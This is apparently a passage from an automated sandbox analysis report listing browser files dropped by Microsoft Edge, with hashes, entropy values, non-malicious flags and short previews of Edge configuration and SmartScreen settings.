                                                                                                                                                                Entropy (8bit):3.32524464792714
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):13
                                                                                                                                                                Entropy (8bit):2.7192945256669794
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:117.0.2045.47

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                Entropy (8bit):6.0895246082333365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keTKKGf4SjtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynbt5b7VLyMV/YoskFoz
                                                                                                                                                                MD5:5D3FC00A427C3745E99806028763CEFB
                                                                                                                                                                SHA1:0F41F0C777E60428C2C1646D96F323E146CE3F7D
                                                                                                                                                                SHA-256:3CD580E4FA3F6B9DF2E7F0A914B7694095411A4B98CEA84406BD3C3525EEA345
                                                                                                                                                                SHA-512:BFFD852FF5924202A64E1C6DAA851976152CE62A30152FFA2CF278C8DF31C321EEEE66111A80DA6153E47BFAD9207BE5A7B9DA3EDE1F7C5D3E1DE110AB17926F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF31d8b.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                Entropy (8bit):6.0895246082333365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keTKKGf4SjtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynbt5b7VLyMV/YoskFoz
                                                                                                                                                                MD5:5D3FC00A427C3745E99806028763CEFB
                                                                                                                                                                SHA1:0F41F0C777E60428C2C1646D96F323E146CE3F7D
                                                                                                                                                                SHA-256:3CD580E4FA3F6B9DF2E7F0A914B7694095411A4B98CEA84406BD3C3525EEA345
                                                                                                                                                                SHA-512:BFFD852FF5924202A64E1C6DAA851976152CE62A30152FFA2CF278C8DF31C321EEEE66111A80DA6153E47BFAD9207BE5A7B9DA3EDE1F7C5D3E1DE110AB17926F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF31e47.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                Entropy (8bit):6.0895246082333365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keTKKGf4SjtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynbt5b7VLyMV/YoskFoz
                                                                                                                                                                MD5:5D3FC00A427C3745E99806028763CEFB
                                                                                                                                                                SHA1:0F41F0C777E60428C2C1646D96F323E146CE3F7D
                                                                                                                                                                SHA-256:3CD580E4FA3F6B9DF2E7F0A914B7694095411A4B98CEA84406BD3C3525EEA345
                                                                                                                                                                SHA-512:BFFD852FF5924202A64E1C6DAA851976152CE62A30152FFA2CF278C8DF31C321EEEE66111A80DA6153E47BFAD9207BE5A7B9DA3EDE1F7C5D3E1DE110AB17926F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF31fed.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                Entropy (8bit):6.0895246082333365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keTKKGf4SjtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynbt5b7VLyMV/YoskFoz
                                                                                                                                                                MD5:5D3FC00A427C3745E99806028763CEFB
                                                                                                                                                                SHA1:0F41F0C777E60428C2C1646D96F323E146CE3F7D
                                                                                                                                                                SHA-256:3CD580E4FA3F6B9DF2E7F0A914B7694095411A4B98CEA84406BD3C3525EEA345
                                                                                                                                                                SHA-512:BFFD852FF5924202A64E1C6DAA851976152CE62A30152FFA2CF278C8DF31C321EEEE66111A80DA6153E47BFAD9207BE5A7B9DA3EDE1F7C5D3E1DE110AB17926F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF346de.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                Entropy (8bit):6.0895246082333365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keTKKGf4SjtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynbt5b7VLyMV/YoskFoz
                                                                                                                                                                MD5:5D3FC00A427C3745E99806028763CEFB
                                                                                                                                                                SHA1:0F41F0C777E60428C2C1646D96F323E146CE3F7D
                                                                                                                                                                SHA-256:3CD580E4FA3F6B9DF2E7F0A914B7694095411A4B98CEA84406BD3C3525EEA345
                                                                                                                                                                SHA-512:BFFD852FF5924202A64E1C6DAA851976152CE62A30152FFA2CF278C8DF31C321EEEE66111A80DA6153E47BFAD9207BE5A7B9DA3EDE1F7C5D3E1DE110AB17926F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36ee8.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                Entropy (8bit):6.0895246082333365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keTKKGf4SjtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynbt5b7VLyMV/YoskFoz
                                                                                                                                                                MD5:5D3FC00A427C3745E99806028763CEFB
                                                                                                                                                                SHA1:0F41F0C777E60428C2C1646D96F323E146CE3F7D
                                                                                                                                                                SHA-256:3CD580E4FA3F6B9DF2E7F0A914B7694095411A4B98CEA84406BD3C3525EEA345
                                                                                                                                                                SHA-512:BFFD852FF5924202A64E1C6DAA851976152CE62A30152FFA2CF278C8DF31C321EEEE66111A80DA6153E47BFAD9207BE5A7B9DA3EDE1F7C5D3E1DE110AB17926F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                Entropy (8bit):0.6773696719930975
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):47
                                                                                                                                                                Entropy (8bit):4.3818353308528755
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):35
                                                                                                                                                                Entropy (8bit):4.014438730983427
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"forceServiceDetermination":false}

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):81
                                                                                                                                                                Entropy (8bit):4.3439888556902035
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):130439
                                                                                                                                                                Entropy (8bit):3.80180718117079
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40
                                                                                                                                                                Entropy (8bit):4.346439344671015
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):57
                                                                                                                                                                Entropy (8bit):4.556488479039065
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):29
                                                                                                                                                                Entropy (8bit):4.030394788231021
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                Malicious:false
